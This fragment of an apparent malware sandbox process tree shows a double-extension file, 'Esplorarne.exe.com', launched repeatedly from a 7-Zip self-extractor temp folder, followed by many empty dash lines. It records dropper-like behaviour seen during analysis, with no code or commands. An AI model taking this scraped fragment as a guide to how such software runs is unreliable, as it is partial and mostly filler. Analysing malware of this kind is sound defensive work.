C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i120⤵PID:8632
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i121⤵PID:8352
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i122⤵PID:8488
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-